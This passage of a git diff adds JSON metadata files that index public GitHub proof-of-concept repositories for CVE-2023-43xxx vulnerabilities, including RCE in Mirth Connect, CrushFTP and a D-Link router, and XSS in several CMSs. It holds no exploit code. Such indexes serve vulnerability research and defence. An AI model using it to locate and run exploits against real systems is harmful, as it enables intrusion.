"https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4294", + "description": "Repository for CVE-2023-4294 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T10:16:03Z", + "updated_at": "2023-09-24T10:16:04Z", + "pushed_at": "2023-09-24T10:20:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4300.json b/2023/CVE-2023-4300.json new file mode 100644 index 0000000000..d465a1a0cf --- /dev/null +++ b/2023/CVE-2023-4300.json @@ -0,0 +1,33 @@ +[ + { + "id": 883513162, + "name": "CVE-2023-4300", + "full_name": "bde574786\/CVE-2023-4300", + "owner": { + "login": "bde574786", + "id": 102010541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102010541?v=4", + "html_url": "https:\/\/github.com\/bde574786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bde574786\/CVE-2023-4300", + "description": null, + "fork": false, + "created_at": "2024-11-05T05:06:26Z", + "updated_at": "2024-11-05T05:09:09Z", + "pushed_at": "2024-11-05T05:09:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43040.json b/2023/CVE-2023-43040.json new file mode 100644 index 0000000000..acbbdd8682 --- /dev/null +++ b/2023/CVE-2023-43040.json @@ -0,0 +1,33 @@ +[ + { + "id": 835371220, + "name": "CVE-2023-43040", + "full_name": "riza\/CVE-2023-43040", + "owner": { + "login": "riza", + "id": 2565849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2565849?v=4", + "html_url": "https:\/\/github.com\/riza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/riza\/CVE-2023-43040", + "description": "CVE-2023-43040 PoC", + "fork": false, + "created_at": "2024-07-29T17:39:14Z", + "updated_at": "2024-07-30T05:53:26Z", + "pushed_at": "2024-07-29T17:53:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43115.json b/2023/CVE-2023-43115.json new file mode 100644 index 0000000000..9c26d77cdb --- /dev/null +++ b/2023/CVE-2023-43115.json @@ -0,0 +1,33 @@ +[ + { + "id": 697892944, + "name": "ghostscript-CVE-2023-43115", + "full_name": "jostaub\/ghostscript-CVE-2023-43115", + "owner": { + "login": "jostaub", + "id": 67969701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67969701?v=4", + "html_url": "https:\/\/github.com\/jostaub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jostaub\/ghostscript-CVE-2023-43115", + "description": "A small write-up with examples to understand CVE-2023-43115", + "fork": false, + "created_at": "2023-09-28T17:30:06Z", + "updated_at": "2024-04-09T19:00:53Z", + "pushed_at": "2023-12-26T15:37:47Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43144.json b/2023/CVE-2023-43144.json new file mode 100644 index 0000000000..eab93a1aed --- /dev/null +++ b/2023/CVE-2023-43144.json @@ -0,0 +1,33 @@ +[ + { + "id": 704649398, + "name": "CVE-2023-43144", + "full_name": "Pegasus0xx\/CVE-2023-43144", + "owner": { + "login": "Pegasus0xx", + "id": 122263374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122263374?v=4", + "html_url": "https:\/\/github.com\/Pegasus0xx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pegasus0xx\/CVE-2023-43144", + "description": "Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php", + "fork": false, + "created_at": "2023-10-13T18:19:22Z", + "updated_at": "2023-10-13T18:19:22Z", + "pushed_at": "2023-10-13T18:20:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43147.json b/2023/CVE-2023-43147.json new file mode 100644 index 0000000000..f0dc80e83c --- /dev/null +++ b/2023/CVE-2023-43147.json @@ -0,0 +1,33 @@ +[ + { + "id": 703710841, + "name": "CVE-2023-43147", + "full_name": "MinoTauro2020\/CVE-2023-43147", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43147", + "description": "CVE-2023-43148", + "fork": false, + "created_at": "2023-10-11T18:55:40Z", + "updated_at": "2024-07-22T05:50:46Z", + "pushed_at": "2023-10-12T16:22:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43148.json b/2023/CVE-2023-43148.json new file mode 100644 index 0000000000..b81603e798 --- /dev/null +++ b/2023/CVE-2023-43148.json @@ -0,0 +1,33 @@ +[ + { + "id": 692410769, + "name": "CVE-2023-43148", + "full_name": "MinoTauro2020\/CVE-2023-43148", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43148", + "description": "CVE CSRF DELETE ACCOUNT", + "fork": false, + "created_at": "2023-09-16T11:48:44Z", + "updated_at": "2024-07-22T05:50:48Z", + "pushed_at": "2023-10-12T16:09:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43149.json b/2023/CVE-2023-43149.json new file mode 100644 index 0000000000..9609adff8b --- /dev/null +++ b/2023/CVE-2023-43149.json @@ -0,0 +1,33 @@ +[ + { + "id": 704142072, + "name": "CVE-2023-43149", + "full_name": "MinoTauro2020\/CVE-2023-43149", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43149", + "description": "CVE-2023-43149", + "fork": false, + "created_at": "2023-10-12T16:11:39Z", + "updated_at": "2024-07-22T07:13:14Z", + "pushed_at": "2023-10-12T16:23:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43154.json b/2023/CVE-2023-43154.json new file mode 100644 index 0000000000..8e49f30f80 --- /dev/null +++ b/2023/CVE-2023-43154.json @@ -0,0 +1,33 @@ +[ + { + "id": 689157148, + "name": "CVE-2023-43154-PoC", + "full_name": "ally-petitt\/CVE-2023-43154-PoC", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-43154-PoC", + "description": "PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.", + "fork": false, + "created_at": "2023-09-09T00:21:58Z", + "updated_at": "2023-09-22T23:23:27Z", + "pushed_at": "2023-09-22T23:25:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43177.json b/2023/CVE-2023-43177.json new file mode 100644 index 0000000000..43f35c4b8f --- /dev/null +++ b/2023/CVE-2023-43177.json @@ -0,0 +1,33 @@ +[ + { + "id": 736082515, + "name": "CVE-2023-43177", + "full_name": "the-emmons\/CVE-2023-43177", + "owner": { + "login": "the-emmons", + "id": 70683790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70683790?v=4", + "html_url": "https:\/\/github.com\/the-emmons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the-emmons\/CVE-2023-43177", + "description": "CrushFTP <= 10.5.1 Remote Code Execution. Researchers: Ryan Emmons, Evan Malamis", + "fork": false, + "created_at": "2023-12-27T00:06:20Z", + "updated_at": "2024-11-07T04:27:46Z", + "pushed_at": "2024-06-14T17:44:09Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43208.json b/2023/CVE-2023-43208.json new file mode 100644 index 0000000000..03da9b3b84 --- /dev/null +++ b/2023/CVE-2023-43208.json @@ -0,0 +1,140 @@ +[ + { + "id": 772545059, + "name": "CVE-2023-43208-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2023-43208-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-43208-EXPLOIT", + "description": "A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-03-15T12:03:51Z", + "updated_at": "2024-12-07T00:01:21Z", + "pushed_at": "2024-03-16T21:22:27Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43208", + "exploit", + "exploitation", + "exploits", + "hacking", + "mirth-connect", + "poc", + "proof-of-concept", + "rce", + "remote-code-execution", + "remote-code-execution-rce", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 11, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773284524, + "name": "CVE-2023-43208-mirth-connect-rce-poc", + "full_name": "jakabakos\/CVE-2023-43208-mirth-connect-rce-poc", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-43208-mirth-connect-rce-poc", + "description": null, + "fork": false, + "created_at": "2024-03-17T08:44:14Z", + "updated_at": "2024-06-06T11:58:40Z", + "pushed_at": "2024-03-18T14:09:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812794551, + "name": "CVE-2023-43208-MIRTHCONNECT", + "full_name": "J4F9S5D2Q7\/CVE-2023-43208-MIRTHCONNECT", + "owner": { + "login": "J4F9S5D2Q7", + "id": 171471588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171471588?v=4", + "html_url": "https:\/\/github.com\/J4F9S5D2Q7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J4F9S5D2Q7\/CVE-2023-43208-MIRTHCONNECT", + "description": null, + "fork": false, + "created_at": "2024-06-09T22:25:22Z", + "updated_at": "2024-06-09T22:34:38Z", + "pushed_at": "2024-06-09T22:33:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895464509, + "name": "CVE-2023-43208_Detection_PoC", + "full_name": "Avento\/CVE-2023-43208_Detection_PoC", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-43208_Detection_PoC", + "description": "Use java.net.InetAddress for detection", + "fork": false, + "created_at": "2024-11-28T09:03:23Z", + "updated_at": "2024-11-28T15:21:14Z", + "pushed_at": "2024-11-28T09:05:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43261.json b/2023/CVE-2023-43261.json new file mode 100644 index 0000000000..50b49de5da --- /dev/null +++ b/2023/CVE-2023-43261.json @@ -0,0 +1,35 @@ +[ + { + "id": 697676686, + "name": "CVE-2023-43261", + "full_name": "win3zz\/CVE-2023-43261", + "owner": { + "login": "win3zz", + "id": 12781459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12781459?v=4", + "html_url": "https:\/\/github.com\/win3zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/win3zz\/CVE-2023-43261", + "description": "CVE-2023-43261 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption", + "fork": false, + "created_at": "2023-09-28T08:45:55Z", + "updated_at": "2024-11-06T11:42:29Z", + "pushed_at": "2023-10-01T08:36:06Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43261" + ], + "visibility": "public", + "forks": 8, + "watchers": 56, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43263.json b/2023/CVE-2023-43263.json new file mode 100644 index 0000000000..7876c4510c --- /dev/null +++ b/2023/CVE-2023-43263.json @@ -0,0 +1,33 @@ +[ + { + "id": 696679641, + "name": "CVE-2023-43263", + "full_name": "b0marek\/CVE-2023-43263", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-43263", + "description": "Repository for CVE-2023-43263 vulnerability. ", + "fork": false, + "created_at": "2023-09-26T08:24:16Z", + "updated_at": "2023-09-28T13:56:26Z", + "pushed_at": "2023-10-10T07:17:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43284.json b/2023/CVE-2023-43284.json new file mode 100644 index 0000000000..d84aabbbaf --- /dev/null +++ b/2023/CVE-2023-43284.json @@ -0,0 +1,33 @@ +[ + { + "id": 700363228, + "name": "CVE-2023-43284", + "full_name": "MateusTesser\/CVE-2023-43284", + "owner": { + "login": "MateusTesser", + "id": 45717435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45717435?v=4", + "html_url": "https:\/\/github.com\/MateusTesser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MateusTesser\/CVE-2023-43284", + "description": "DLink DIR-846 Authenticated Remote Code Execution", + "fork": false, + "created_at": "2023-10-04T13:07:37Z", + "updated_at": "2024-05-16T03:37:47Z", + "pushed_at": "2023-10-04T13:31:59Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43317.json b/2023/CVE-2023-43317.json new file mode 100644 index 0000000000..b509d060f9 --- /dev/null +++ b/2023/CVE-2023-43317.json @@ -0,0 +1,33 @@ +[ + { + "id": 747061917, + "name": "CVE-2023-43317", + "full_name": "amjadali-110\/CVE-2023-43317", + "owner": { + "login": "amjadali-110", + "id": 140477743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140477743?v=4", + "html_url": "https:\/\/github.com\/amjadali-110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amjadali-110\/CVE-2023-43317", + "description": "Vertical Privilege Escalation via Session Storage by Amjad Ali (CVE-2023-43317)", + "fork": false, + "created_at": "2024-01-23T07:27:30Z", + "updated_at": "2024-08-23T05:41:32Z", + "pushed_at": "2024-08-23T05:41:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43318.json b/2023/CVE-2023-43318.json new file mode 100644 index 0000000000..6dbb459402 --- /dev/null +++ b/2023/CVE-2023-43318.json @@ -0,0 +1,33 @@ +[ + { + "id": 765669255, + "name": "CVE-2023-43318", + "full_name": "str2ver\/CVE-2023-43318", + "owner": { + "login": "str2ver", + "id": 161814438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161814438?v=4", + "html_url": "https:\/\/github.com\/str2ver", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/str2ver\/CVE-2023-43318", + "description": "JetStream Smart Switch - TL-SG2210P v5.0\/ Improper Access Control \/ CVE-2023-43318", + "fork": false, + "created_at": "2024-03-01T11:35:47Z", + "updated_at": "2024-03-01T11:35:47Z", + "pushed_at": "2024-03-01T11:53:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43323.json b/2023/CVE-2023-43323.json new file mode 100644 index 0000000000..0f78164848 --- /dev/null +++ b/2023/CVE-2023-43323.json @@ -0,0 +1,33 @@ +[ + { + "id": 692272876, + "name": "CVE-2023-43323", + "full_name": "ahrixia\/CVE-2023-43323", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43323", + "description": "mooSocial v3.1.8 is vulnerable to external service interaction on post function.", + "fork": false, + "created_at": "2023-09-16T01:28:58Z", + "updated_at": "2024-08-12T20:32:45Z", + "pushed_at": "2023-09-26T15:32:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43325.json b/2023/CVE-2023-43325.json new file mode 100644 index 0000000000..824d9adbe6 --- /dev/null +++ b/2023/CVE-2023-43325.json @@ -0,0 +1,35 @@ +[ + { + "id": 692268843, + "name": "CVE-2023-43325", + "full_name": "ahrixia\/CVE-2023-43325", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43325", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on user login function.", + "fork": false, + "created_at": "2023-09-16T01:05:16Z", + "updated_at": "2024-08-12T20:32:45Z", + "pushed_at": "2023-09-29T14:53:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43326.json b/2023/CVE-2023-43326.json new file mode 100644 index 0000000000..005abc938a --- /dev/null +++ b/2023/CVE-2023-43326.json @@ -0,0 +1,33 @@ +[ + { + "id": 693444960, + "name": "CVE-2023-43326", + "full_name": "ahrixia\/CVE-2023-43326", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43326", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Multiple URLs.", + "fork": false, + "created_at": "2023-09-19T03:38:25Z", + "updated_at": "2024-08-12T20:32:47Z", + "pushed_at": "2023-09-26T16:14:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43339.json b/2023/CVE-2023-43339.json new file mode 100644 index 0000000000..ab27e81671 --- /dev/null +++ b/2023/CVE-2023-43339.json @@ -0,0 +1,33 @@ +[ + { + "id": 692439285, + "name": "CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation", + "full_name": "sromanhu\/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation", + "description": "CMSmadesimple 2.2.18 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.", + "fork": false, + "created_at": "2023-09-16T13:35:49Z", + "updated_at": "2023-09-25T21:41:42Z", + "pushed_at": "2023-09-18T06:55:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43340.json b/2023/CVE-2023-43340.json new file mode 100644 index 0000000000..fbbe65ad86 --- /dev/null +++ b/2023/CVE-2023-43340.json @@ -0,0 +1,33 @@ +[ + { + "id": 693008952, + "name": "-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options", + "full_name": "sromanhu\/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options", + "description": "Evolution CMS 3.2.3 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation\/options process.", + "fork": false, + "created_at": "2023-09-18T06:58:39Z", + "updated_at": "2023-09-28T22:32:26Z", + "pushed_at": "2023-09-21T12:10:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43341.json b/2023/CVE-2023-43341.json new file mode 100644 index 0000000000..21ec25bdc4 --- /dev/null +++ b/2023/CVE-2023-43341.json @@ -0,0 +1,33 @@ +[ + { + "id": 693001684, + "name": "CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-", + "full_name": "sromanhu\/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-", + "description": "Evolution CMS 3.2.3 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation\/connection process.", + "fork": false, + "created_at": "2023-09-18T06:39:38Z", + "updated_at": "2023-09-28T22:32:45Z", + "pushed_at": "2023-09-21T12:11:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43342.json b/2023/CVE-2023-43342.json new file mode 100644 index 0000000000..7d85794c92 --- /dev/null +++ b/2023/CVE-2023-43342.json @@ -0,0 +1,33 @@ +[ + { + "id": 693029467, + "name": "CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend", + "full_name": "sromanhu\/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Frontend- Pages in the Languages Menu.", + "fork": false, + "created_at": "2023-09-18T07:51:26Z", + "updated_at": "2023-09-28T22:33:06Z", + "pushed_at": "2023-09-21T12:05:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43343.json b/2023/CVE-2023-43343.json new file mode 100644 index 0000000000..e7eb8b536f --- /dev/null +++ b/2023/CVE-2023-43343.json @@ -0,0 +1,33 @@ +[ + { + "id": 693015649, + "name": "CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files", + "full_name": "sromanhu\/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Files - Description in the Pages Menu.", + "fork": false, + "created_at": "2023-09-18T07:16:18Z", + "updated_at": "2023-09-28T22:33:23Z", + "pushed_at": "2023-09-21T12:08:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43344.json 